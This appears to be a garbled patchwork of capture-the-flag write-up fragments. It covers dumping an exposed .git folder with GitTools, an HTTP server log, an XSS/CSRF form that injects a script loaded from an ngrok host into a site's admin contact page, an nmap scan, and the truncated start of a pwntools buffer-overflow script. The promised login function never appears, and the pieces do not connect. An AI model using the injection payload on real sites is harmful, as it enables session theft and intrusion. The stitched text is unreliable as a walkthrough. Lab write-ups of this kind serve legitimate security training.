There is a hidden .git folder.
You can use GitTools (https://github.com/internetwache/GitTools) to download the .git folder and extract the files.
First dump the files using Dumper, then extract the files of each commit using Extractor. Both tools are available at the link above.
Once you have downloaded and analyzed the files, you can see that an index.php file was deleted; its code is visible because we extracted it with Extractor in the step above.
URI: 3e90c63922fa145442bb58d18b62af6c21717fee/index.php
In index.php the login validation function is as follows:
Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [22/Oct/2017 21:29:11] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [22/Oct/2017 21:29:11] code 404, message File not found
127.0.0.1 - - [22/Oct/2017 21:29:11] "GET /favicon.ico HTTP/1.1" 404 -
127.0.0.1 - - [22/Oct/2017 21:29:40] "GET /ew.js HTTP/1.1" 200 -
127.0.0.1 - - [22/Oct/2017 21:30:11] "GET /ew.js HTTP/1.1" 200 -
127.0.0.1 - - [22/Oct/2017 21:30:12] code 404, message File not found
127.0.0.1 - - [22/Oct/2017 21:30:12] "GET /favicon.ico HTTP/1.1" 404 -
127.0.0.1 - - [22/Oct/2017 21:33:38] "GET /ew.js HTTP/1.1" 200 -
http://1128152f.ngrok.io/ew.js -> redirection script
------------------------------------------------
<!--Actual file to be run-->
<form id='f' action="http://bloodsuckers.world/admin/contact" method='POST'>
<input type="text" name="name" value="';x='">
<input type="text" name="name" value="';var script = document.createElement('script'); script.src = 'http://1128152f.ngrok.io/ew.js';document.body.appendChild(script);//">
<input type="text" name="message" value="hohoho">
</form>
PORT   STATE SERVICE REASON          VERSION
21/tcp open  ftp     syn-ack ttl 128 FileZilla ftpd
| ftp-syst:
|_  SYST: UNIX emulated by FileZilla
| ssl-date:
|_  ERROR: Unable to obtain data from the target
53/tcp open  domain  syn-ack ttl 128 Microsoft DNS
80/tcp open  http    syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
# Download : http://pwnable.kr/bin/bof
# Download : http://pwnable.kr/bin/bof.c
from pwn import *
import struct
import time
import re

for i in range(0, 100):
    s = remote('pwnable.kr', 9000)